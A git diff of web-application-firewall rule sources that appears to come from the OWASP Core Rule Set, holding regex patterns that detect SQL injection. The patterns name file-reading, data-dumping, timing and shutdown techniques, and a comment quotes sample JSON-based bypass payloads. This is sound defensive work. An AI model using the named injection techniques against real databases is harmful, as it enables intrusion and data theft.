documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define punctuation-hexnumbers ,.*?[)\da-f\"'`] + +##!> define ticks [\"'`] + +##!> define spaces \s*?\(\s*?space\s*?\( + +##! Main assembly +##!> assemble + {{punctuation-hexnumbers}}{{ticks}} + ##!=> + {{ticks}}.*?{{ticks}} + (?:\r?\n)?\z + [^\"'`]+ + ##!=> +##!< + +\Wselect.+\W*?from + +##!> assemble + alter + create + delete + desc + drop + insert + load + rename + select + truncate + update + ##!=> + {{spaces}} + ##!=> +##!< diff --git a/regex-assembly/942210.ra b/regex-assembly/942210.ra new file mode 100644 index 0000000000..dfad326639 --- /dev/null +++ b/regex-assembly/942210.ra @@ -0,0 +1,109 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Looking for patterns like: +##! between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] + +##!> assemble + && + \|\| + and + between + div + like + nand + not + or + xor + xxor + ##!=> + + [\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +##!< + + +##! Looking for patterns like: +##! \d\s*?between\s*?\d+\s*?[\-+] + +##!> assemble + \d\s*? + ##!=> + + and + between + div + like + or + xor + ##!=> + + \s*?\d+\s*?[\-+] +##!< + +##! Looking for a variation of the pattern above: +\d\s+group\s+by.+\( + + +##! Looking for patterns like: +##! \/\w+;?\s+between\W + +##!> assemble + \/\w+;?\s+ + ##!=> + + and + between + div + having + like + or + select + xor + ##!=> + + \W +##!< + + +##! Looking for patterns like: +##! ;\s*?drop +##! #\s*?alter +##! --\s*?drop + +##!> assemble + ;\s*? + #\s*? + --\s*? + ##!=> + + alter + drop + ##!=> +##!< + + +##! Looking for patterns like: +##! ;\s*?update\s*?\w{2,} +##! #\s*?insert\s*?\w{2,} +##! --\s*?update\s*?\w{2,} + +##!> assemble + ;\s*? + #\s*? + --\s*? + ##!=> + + insert + update + ##!=> + + \s*?\w{2,} + ##!=> +##!< + + +##! Looking for these unique patterns: +@.+=\s*?\(\s*?select +[^\w]SET\s*?@\w+ diff --git a/regex-assembly/942230.ra b/regex-assembly/942230.ra new file mode 100644 index 0000000000..7c0dafd046 --- /dev/null +++ b/regex-assembly/942230.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +[\s()]case\s+when.*?then +\)\s*?like\s*?\( +select.*?having\s*?[^\s]+\s*?[^\w\s] +if\s?\(\w+\s*?[=<>~] diff --git a/regex-assembly/942240.ra b/regex-assembly/942240.ra new file mode 100644 index 0000000000..fd42ddd103 --- /dev/null +++ b/regex-assembly/942240.ra @@ -0,0 +1,32 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define alter alter\s*?\w+.*? + +##!> define set \s+set\s+\w+ + +##!> define ticks [\"'`] + +##!> define waitfor \s*?waitfor\s+ + +##! Main assembly +##!> assemble + {{alter}} + ##!=> + char + character + ##!=> + {{set}} +##!< + +##!> assemble + {{ticks}} + ##!=> + ;*?{{waitfor}}time\s+[\"'`] + ;*?{{waitfor}}delay\s+[\"'`] + ;.*?:\s*?goto + ##!=> +##!< diff --git a/regex-assembly/942260.ra b/regex-assembly/942260.ra new file mode 100644 index 0000000000..10fa4766d4 --- /dev/null +++ b/regex-assembly/942260.ra @@ -0,0 +1,31 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define quotes [\"'`] + + +##!> assemble + {{quotes}}\s*? + ##!=> + and + nand + or + xor + xxor + div + like + between + not + \|\| + && + ##!=> + \s+[\s\w]+=\s*?\w+\s*?having\s+ + ##!=> +##!< + +\w\s+like\s+{{quotes}} +like\s*?{{quotes}}\% +{{quotes}}\s*?like\W*?[\"'`\d] +select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ diff --git a/regex-assembly/942280.ra b/regex-assembly/942280.ra new file mode 100644 index 0000000000..0d07e85b7b --- /dev/null +++ b/regex-assembly/942280.ra @@ -0,0 +1,20 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define optional_whitespace \s*? + +##! The following part is going to be appended +##! to match the end of a query or a comment syntax +##!> define terminators (?:[#;{]|\/\*|--) + +##! In PostgreSQL, you can use the pg_sleep() function +##! to delay execution for a given number of seconds +select{{optional_whitespace}}pg_sleep + +##! WAITFOR DELAY blocks the execution until a time interval elapses +waitfor{{optional_whitespace}}delay\s?[\"'`]+\s?\d + +##! SHUTDOWN immediately stops SQL Server +;{{optional_whitespace}}shutdown{{optional_whitespace}}{{terminators}} diff --git a/regex-assembly/942290.ra b/regex-assembly/942290.ra new file mode 100644 index 0000000000..2966c2ee75 --- /dev/null +++ b/regex-assembly/942290.ra @@ -0,0 +1,41 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define operator_syntax_start \[?\$ +##!> define operator_syntax_end \]? + +##!> assemble + {{operator_syntax_start}} + ##!=> + ne + eq + lt + lte + ni + nin + mod + all + size + exists + type + slice + or + xor + nor + div + like + between + and + nor + not + regex + text + where + jsonSchema + elemMatch + ##!=> + {{operator_syntax_end}} + ##!=> +##!< diff --git a/regex-assembly/942300.ra b/regex-assembly/942300.ra new file mode 100644 index 0000000000..bf4275210b --- /dev/null +++ b/regex-assembly/942300.ra @@ -0,0 +1,60 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define required-spaces-plus-sql-function-call \s+\w+\( +##!> define quotes [\"'`] +##!> define start-comment \/\*! +##!> define lazy-optional-spaces \s*? +##!> define lazy-optional-spaces-with-numbers {{lazy-optional-spaces}}\d+{{lazy-optional-spaces}} +##!> define lazy-optional-spaces-numeric-function-call {{lazy-optional-spaces}}\({{lazy-optional-spaces}}\d +##!> define lazy-optional-spaces-plus-sql-function-call {{lazy-optional-spaces}}\w+\( + +\){{lazy-optional-spaces}}when{{lazy-optional-spaces-with-numbers}}then + +##!> assemble + {{quotes}}{{lazy-optional-spaces}} + ##!=> + # + -- + { +##!< + +{{start-comment}}\s?\d+ + +##!> assemble + \b + ##!=> + + ##!> assemble + binary + char + chr + ##!=> + {{lazy-optional-spaces-numeric-function-call}} + ##!< + + ##!> assemble + and + nand + or + xor + xxor + div + like + between + not + regexp + rlike + ##!=> + {{required-spaces-plus-sql-function-call}} + ##!< +##!< + +##!> assemble + \|\| + && + ##!=> + {{lazy-optional-spaces-plus-sql-function-call}} +##!< diff --git a/util/regexp-assemble/regexp-942310.data b/regex-assembly/942310.ra similarity index 72% rename from util/regexp-assemble/regexp-942310.data rename to regex-assembly/942310.ra index be535c05ee..2040b9e3fa 100644 --- a/util/regexp-assemble/regexp-942310.data +++ b/regex-assembly/942310.ra @@ -1,4 +1,8 @@ -[\"'`]\s+and\s*?=\W +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + \(\s*?select\s*?\w+\s*?\( \*\/from \+\s*?\d+\s*?\+\s*?@ diff --git a/regex-assembly/942320.ra b/regex-assembly/942320.ra new file mode 100644 index 0000000000..c19b5fa7d7 --- /dev/null +++ b/regex-assembly/942320.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-mysql-postgresql-procedures-functions.ra diff --git a/regex-assembly/942321.ra b/regex-assembly/942321.ra new file mode 100644 index 0000000000..c19b5fa7d7 --- /dev/null +++ b/regex-assembly/942321.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-mysql-postgresql-procedures-functions.ra diff --git a/regex-assembly/942330.ra b/regex-assembly/942330.ra new file mode 100644 index 0000000000..f1e2ec9dfe --- /dev/null +++ b/regex-assembly/942330.ra @@ -0,0 +1,51 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +[\"'`]\s*?\bor\b\s*?[\"'`]?\d +[\"'`]\s*?\bxor\b\s*?[\"'`]?\d +[\"'`]\s*?\bdiv\b\s*?[\"'`]?\d +[\"'`]\s*?\blike\b\s*?[\"'`]?\d +[\"'`]\s*?\bbetween\b\s*?[\"'`]?\d +[\"'`]\s*?\band\b\s*?[\"'`]?\d +\x5cx(?:23|27|3d) +^.?[\"'`]$ +^[\"'`\x5c]*?[\d\"'`]+\s*?\band\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\blike\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\band\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\blike\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-] +[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w +@\w+\s+and\b\s*?[\"'`\d]+ +@\w+\s+or\b\s*?[\"'`\d]+ +@\w+\s+xor\b\s*?[\"'`\d]+ +@\w+\s+div\b\s*?[\"'`\d]+ +@\w+\s+like\b\s*?[\"'`\d]+ +@\w+\s+between\b\s*?[\"'`\d]+ +@[\w-]+\sand\b\s*?[^\w\s] +@[\w-]+\sor\b\s*?[^\w\s] +@[\w-]+\sxor\b\s*?[^\w\s] +@[\w-]+\sdiv\b\s*?[^\w\s] +@[\w-]+\slike\b\s*?[^\w\s] +@[\w-]+\sbetween\b\s*?[^\w\s] +[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. +\Winformation_schema +table_name\W diff --git a/regex-assembly/942340.ra b/regex-assembly/942340.ra new file mode 100644 index 0000000000..385bd8443e --- /dev/null +++ b/regex-assembly/942340.ra @@ -0,0 +1,28 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +in\s*?\(+\s*?select +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+regexp\s*?\( +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+sounds\s+like\s*?[\"'`] +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+[=\d]+x +[\"'`]\s*?\d\s*?-- +[\"'`]\s*?\d\s*?# +[\"'`][\%&<>^=]+\d\s*?= +[\"'`][\%&<>^=]+\d\s*?or +[\"'`][\%&<>^=]+\d\s*?xor +[\"'`][\%&<>^=]+\d\s*?div +[\"'`][\%&<>^=]+\d\s*?like +[\"'`][\%&<>^=]+\d\s*?between +[\"'`][\%&<>^=]+\d\s*?and +[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] +[\"'`]\s*?is\s*?\d.+[\"'`]?\w +[\"'`]\|?[\w-]{3,}[^\w\s.,]+[\"'`] +[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] +\bexcept\s+select\b +\bexcept\s+values\s*?\( +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)array\s*\[ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s*!?~ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s+(?:not\s+)?similar\s+to\s+ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)(?:true|false)\b diff --git a/regex-assembly/942350.ra b/regex-assembly/942350.ra new file mode 100644 index 0000000000..170fbd397e --- /dev/null +++ b/regex-assembly/942350.ra @@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +create\s+function\s.+\sreturns + +##!> assemble + + ##! matching the injection start + ;\s*? + + ##!=> + alter + create + delete + desc + drop + insert + load + rename + select + truncate + update + ##!=> + + ##! matching function/object parameters syntax + \b\s*?[\[(]?\w{2,} + ##!=> +##!< diff --git a/util/regexp-assemble/regexp-942360.data b/regex-assembly/942360.ra similarity index 70% rename from util/regexp-assemble/regexp-942360.data rename to regex-assembly/942360.ra index 177c18fdfe..62a4b6c801 100644 --- a/util/regexp-assemble/regexp-942360.data +++ b/regex-assembly/942360.ra @@ -1,46 +1,52 @@ -alter\s+char\s?[(]? -alter\s+group_concat\s?[(]? -alter\s+load_file\s?[(]? -create\s+char\s?[(]? -create\s+group_concat\s?[(]? -create\s+load_file\s?[(]? -delete\s+char\s?[(]? -delete\s+group_concat\s?[(]? -delete\s+load_file\s?[(]? -desc\s+char\s?[(]? -desc\s+group_concat\s?[(]? -desc\s+load_file\s?[(]? -insert\s+char\s?[(]? -insert\s+group_concat\s?[(]? -insert\s+load_file\s?[(]? -load\s+char\s?[(]? -load\s+group_concat\s?[(]? -load\s+load_file\s?[(]? -rename\s+char\s?[(]? -rename\s+group_concat\s?[(]? -rename\s+load_file\s?[(]? -select\s+char\s?[(]? -select\s+group_concat\s?[(]? -select\s+load_file\s?[(]? -truncate\s+char\s?[(]? -truncate\s+group_concat\s?[(]? -truncate\s+load_file\s?[(]? -update\s+char\s?[(]? -update\s+group_concat\s?[(]? -update\s+load_file\s?[(]? -end\s*?\); +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\balter\s+char\b\s*\(? +\balter\s+group_concat\b\s*\(? +\balter\s+load_file\b\s*\(? +\bcreate\s+char\b\s*\(? +\bcreate\s+group_concat\b\s*\(? +\bcreate\s+load_file\b\s*\(? +\bdelete\s+char\b\s*\(? +\bdelete\s+group_concat\b\s*\(? +\bdelete\s+load_file\b\s*\(? +\bdesc\s+char\b\s*\(? +\bdesc\s+group_concat\b\s*\(? +\bdesc\s+load_file\b\s*\(? +\binsert\s+char\b\s*\(? +\binsert\s+group_concat\b\s*\(? +\binsert\s+load_file\b\s*\(? +\bload\s+char\b\s*\(? +\bload\s+group_concat\b\s*\(? +\bload\s+load_file\b\s*\(? +\brename\s+char\b\s*\(? +\brename\s+group_concat\b\s*\(? +\brename\s+load_file\b\s*\(? +\bselect\s+char\b\s*\(? +\bselect\s+group_concat\b\s*\(? +\bselect\s+load_file\b\s*\(? +\btruncate\s+char\b\s*\(? +\btruncate\s+group_concat\b\s*\(? +\btruncate\s+load_file\b\s*\(? +\bupdate\s+char\b\s*\(? +\bupdate\s+group_concat\b\s*\(? +\bupdate\s+load_file\b\s*\(? +\bend\s*?\); [\s(]load_file\s*?\( [\"'`]\s+regexp\W -[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom +[\"'`\w]\s+as\b\s*[\"'`\w]+\s*\bfrom ^[\W\d]+\s*?create\s+\w+ -^[\W\d]+\s*?delete\b -^[\W\d]+\s*?desc\b -^[\W\d]+\s*?insert\b -^[\W\d]+\s*?load\b -^[\W\d]+\s*?rename\b -^[\W\d]+\s*?select\b -^[\W\d]+\s*?truncate\b -^[\W\d]+\s*?update\b +^[\W\d]+\s*?delete\s+\w+ +^[\W\d]+\s*?desc\s+\w+ +^[\W\d]+\s*?drop\s+\w+ +^[\W\d]+\s*?insert\s+\w+ +^[\W\d]+\s*?load\s+\w+ +^[\W\d]+\s*?rename\s+\w+ +^[\W\d]+\s*?select\s+\w+ +^[\W\d]+\s*?truncate\s+\w+ +^[\W\d]+\s*?update\s+\w+ ^[\W\d]+\s*?alter\s*aggregate\b ^[\W\d]+\s*?alter\s*application\s*role\b ^[\W\d]+\s*?alter\s*assembly\b diff --git a/regex-assembly/942362.ra b/regex-assembly/942362.ra new file mode 100644 index 0000000000..f0461e3331 --- /dev/null +++ b/regex-assembly/942362.ra @@ -0,0 +1,171 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers + +##!> define nonword_number ^[\W\d]+\s*? + +##!> define cmd_alter alter +##!> define cmd_create create +##!> define cmd_delete delete +##!> define cmd_desc desc +##!> define cmd_insert insert +##!> define cmd_load load +##!> define cmd_rename rename +##!> define cmd_select select +##!> define cmd_truncate truncate +##!> define cmd_update update +##!> define cmd_drop drop +##!> define cmd_union union + +##!> define seq_char \s+char\s?\(? +##!> define seq_group_concat \s+group_concat\s?\(? +##!> define seq_load_file \s+load_file\s?\(? + +##! Main assembly +##!> assemble + ##!> assemble + {{cmd_alter}} + {{cmd_create}} + {{cmd_delete}} + {{cmd_desc}} + {{cmd_insert}} + {{cmd_load}} + {{cmd_rename}} + {{cmd_select}} + {{cmd_truncate}} + {{cmd_update}} + ##!=> + {{seq_char}} + {{seq_group_concat}} + {{seq_load_file}} + ##!< + + end\s*?\); + [\s(]load_file\s*?\( + [\"'`]\s+regexp\W + [\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom + + ##!> assemble + {{nonword_number}} + ##!=> + {{cmd_create}}\s+\w+ + {{cmd_delete}}\b + {{cmd_desc}}\b + {{cmd_drop}}\b + {{cmd_insert}}\b + {{cmd_load}}\b + {{cmd_rename}}\b + {{cmd_select}}\b + {{cmd_truncate}}\b + {{cmd_update}}\b + ##!> assemble + {{cmd_alter}}\s* + ##!=> + aggregate + application\s*role + assembly + asymmetric\s*key + audit + authorization + availability\s*group + broker\s*priority + bufferpool + certificate + cluster + collation + column + conversion + credential + cryptographic\s*provider + database + default + dimension + diskgroup + domain + endpoint + extension + external + event + flashback + foreign + fulltext + function + hierarchy + group + histogram + index + indextype + inmemory + instance + java + language + large + library + lockdown + logfile\s*group + login + mask + master\s*key + materialized + message\s*type + method + module + nickname + operator + outline + package + partition + permission + procedure + profile + queue + remote + resource + role + rollback + route + schema + search + security + server + service + sequence + session + symmetric\s*key + synonym + stogroup + table + tablespace + text + threshold + trigger + trusted + type + usage + user + view + work + workload + wrapper + xml\s*schema + xsrobject + ##!=> + \b + ##!=> + ##!< + + ##!> assemble + {{cmd_union}}\s* + ##!=> + all + select + distinct + ##!=> + \b + ##!=> + ##!< + ##!< +##!< diff --git a/regex-assembly/942370.ra b/regex-assembly/942370.ra new file mode 100644 index 0000000000..e8253dc4ea --- /dev/null +++ b/regex-assembly/942370.ra @@ -0,0 +1,51 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define quotes [\"'`] + +##!> assemble + or + xor + div + like + between + and + ##!=< operators +##!< + +##! Main assembly +##!> assemble + {{quotes}}\s*? + ##!=> + ##!> assemble + \*.+ + ##!=> + ##!> assemble + ##!> assemble + ##!=> operators + ##!< + id + ##!=> + ##!< + ##!=> + \W*?{{quotes}}\d + ##!=> + ##!< + [^\w\s?]+\s*?[^\w\s]+\s*?{{quotes}} + [^\w\s]+\s*?[\W\d].*?# + [^\w\s]+\s*?[\W\d].*?-- + ##!> assemble + ##!> assemble + ##!=> operators + ##!< + ##!=> + \s[^\d]+[\w-]+.*?\d + ##!< +##!< + +\^{{quotes}} +{{quotes}}.*?\*\s*?\d +[()\*<>%+-][\w-]+[^\w\s]+{{quotes}}[^,] diff --git a/regex-assembly/942380.ra b/regex-assembly/942380.ra new file mode 100644 index 0000000000..7c435bce61 --- /dev/null +++ b/regex-assembly/942380.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\bhaving\b\s+\d{1,10}\s*?[=<>] +\bhaving\b\s+'[^=]{1,10}'\s*?[=<>] +\bexecute\( +\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3} +\bhaving\b ?\d{1,10} ?[=<>]+ +\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ +\bcreate\s+?table.{0,20}?\( +\blike\W*?char\W*?\( +select.*?case +from.*?limit +order\sby +exists\s\sselect +exists\sselect\Sif\s\( +exists\sselect\Sifnull\s\( +exists\sselect\Stop +exists\sselect\Sconcat +exists\ssystem\s\( +exists\s\bhaving\b\s+\d{1,10} +exists\s'[^=]{1,10}' +\bexists\s*?\(\s*?select\b diff --git a/regex-assembly/942390.ra b/regex-assembly/942390.ra new file mode 100644 index 0000000000..b13dab49f2 --- /dev/null +++ b/regex-assembly/942390.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\bor\b\s?\d{1,10}\s?[=<>]+ +\bor\b\s?[\'\"][^=]{1,10}[\'\"]\s?[=<>]+ +'\s+or\s+.{1,20}[+\-!<>=] +'\s+xor\s+.{1,20}[+\-!<>=] +\bor\b\s+\d{1,10} +\bor\b\s+'[^=]{1,10}' +\bxor\b\s+\d{1,10} +\bxor\b\s+'[^=]{1,10}' +\bor\b\s+\d{1,10}\s*?[=<>] +\bxor\b\s+\d{1,10}\s*?[=<>] +\bor\b\s+'[^=]{1,10}'\s*?[=<>] +\bxor\b\s+'[^=]{1,10}'\s*?[=<>] diff --git a/util/regexp-assemble/regexp-942400.data b/regex-assembly/942400.ra similarity index 51% rename from util/regexp-assemble/regexp-942400.data rename to regex-assembly/942400.ra index 45b39f171e..6852bcf842 100644 --- a/util/regexp-assemble/regexp-942400.data +++ b/regex-assembly/942400.ra @@ -1,6 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + \band\b\s+\d{1,10}\s*?[=<>] -\band\b\s+'[^=]{1,10}'\s*?[=<>] -\band\b\s+\d{1,10} \band\b\s+'[^=]{1,10}' \band\b ?\d{1,10} ?[=<>]+ \band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+ diff --git a/util/regexp-assemble/regexp-942410.data b/regex-assembly/942410.ra similarity index 93% rename from util/regexp-assemble/regexp-942410.data rename to regex-assembly/942410.ra index 62a5bb5934..751d6252f6 100644 --- a/util/regexp-assemble/regexp-942410.data +++ b/regex-assembly/942410.ra @@ -1,3 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \W*?\( + abs acos adddate diff --git a/regex-assembly/942440-chain1.ra b/regex-assembly/942440-chain1.ra new file mode 100644 index 0000000000..1592b5b1bd --- /dev/null +++ b/regex-assembly/942440-chain1.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This chained rule is used to match on JWT base64-urlencoded tokens. +##! See https://www.rfc-editor.org/rfc/rfc4648#section-5 for details. + +##! JWTs consist of base64-urlencoded encoded JSON, and a JSON structure +##! just starts with '{"', which becomes 'ey' when encoded with a base64-urlencoded encoder. + +##!> define base64-urlencoded-charset [a-zA-Z0-9_-]+ +##!> define dot [.] + +##!^ ^ey + +{{base64-urlencoded-charset}} + +##!=> + +{{dot}}ey{{base64-urlencoded-charset}} + +##!=> + +{{dot}}{{base64-urlencoded-charset}} + +##!$ $ diff --git a/regex-assembly/942440.ra b/regex-assembly/942440.ra new file mode 100644 index 0000000000..4d790510a7 --- /dev/null +++ b/regex-assembly/942440.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +/\*!? +\*/ +[';]-- +--\s +--[^-]*?- +[^&-]#.*?\s +;?\x00 diff --git a/util/regexp-assemble/regexp-942470.data b/regex-assembly/942470.ra similarity index 83% rename from util/regexp-assemble/regexp-942470.data rename to regex-assembly/942470.ra index ad69d1adbe..e9f5f3b558 100644 --- a/util/regexp-assemble/regexp-942470.data +++ b/regex-assembly/942470.ra @@ -1,4 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + autonomous_transaction +current_user dba_users dbms_java nvarchar diff --git a/util/regexp-assemble/regexp-942480.data b/regex-assembly/942480.ra similarity index 83% rename from util/regexp-assemble/regexp-942480.data rename to regex-assembly/942480.ra index b34a23adc5..77655c6e4b 100644 --- a/util/regexp-assemble/regexp-942480.data +++ b/regex-assembly/942480.ra @@ -1,3 +1,8 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + \bdbms_\w+\.\b \bdelete\b\W*?\bfrom\b \bgroup\b.*?\bby\b.{1,100}?\bhaving\b @@ -6,6 +11,7 @@ \binto\b\W*?\bdumpfile\b \binto\b\W*?\boutfile\b \bload\b\W*?\bdata\b.*?\binfile\b +\boverlay\b\W*?\(.*?\b\W*?placing\b \bprint\b\W*?\@\@ \bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b \bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b diff --git a/regex-assembly/942500.ra b/regex-assembly/942500.ra new file mode 100644 index 0000000000..99a142dcd9 --- /dev/null +++ b/regex-assembly/942500.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!> define comment-contents (?:[\w\s=_\-()]+) +##!> define c-style-modifiers \s*?[!+] + +##!+ i + +/\*{{c-style-modifiers}}{{comment-contents}}?\*/ diff --git a/regex-assembly/942520.ra b/regex-assembly/942520.ra new file mode 100644 index 0000000000..05ae95b3b0 --- /dev/null +++ b/regex-assembly/942520.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + + +##!^ [\"'`]\s*? + +##! All tests below are prefixed with [\"'`]\s*? + +is\s+not\b +##! all sqlite not smth from https://www.sqlite.org/lang_expr.html +not\s+(?:like|glob|between|null|in|regexp|match)\b +##! sql operators +[|&<>*\/%=^+-] +##! common operators that can't be added to 942120.data +(?:mod|div)\b +sounds\s+like\b diff --git a/regex-assembly/942521.ra b/regex-assembly/942521.ra new file mode 100644 index 0000000000..de2ab19614 --- /dev/null +++ b/regex-assembly/942521.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ ^ +##!+ i + +##! Regex for detecting first word after an odd number of quotes +[^']*?(?:'[^']*?'[^']*?)*?'\s*(\w+)\b +[^\"]*?(?:\"[^\"]*?\"[^\"]*?)*?\"\s*(\w+)\b +[^`]*?(?:`[^`]*?`[^`]*?)*?`\s*(\w+)\b diff --git a/regex-assembly/942540.ra b/regex-assembly/942540.ra new file mode 100644 index 0000000000..248fdfcc6b --- /dev/null +++ b/regex-assembly/942540.ra @@ -0,0 +1,8 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! These expressions look for an ending '; pattern, but won't match if the quotes +##! are balanced. +^[^']*'\s*; +^[^"]*"\s*; +^[^`]*`\s*; diff --git a/regex-assembly/942550.ra b/regex-assembly/942550.ra new file mode 100644 index 0000000000..bf65e63cfa --- /dev/null +++ b/regex-assembly/942550.ra @@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Referring to https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf +##! this rule tries to match the following payloads: +##! +##! PostgreSQL: '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb @ '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb +##! PostgreSQL: '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb +##! SQLite: 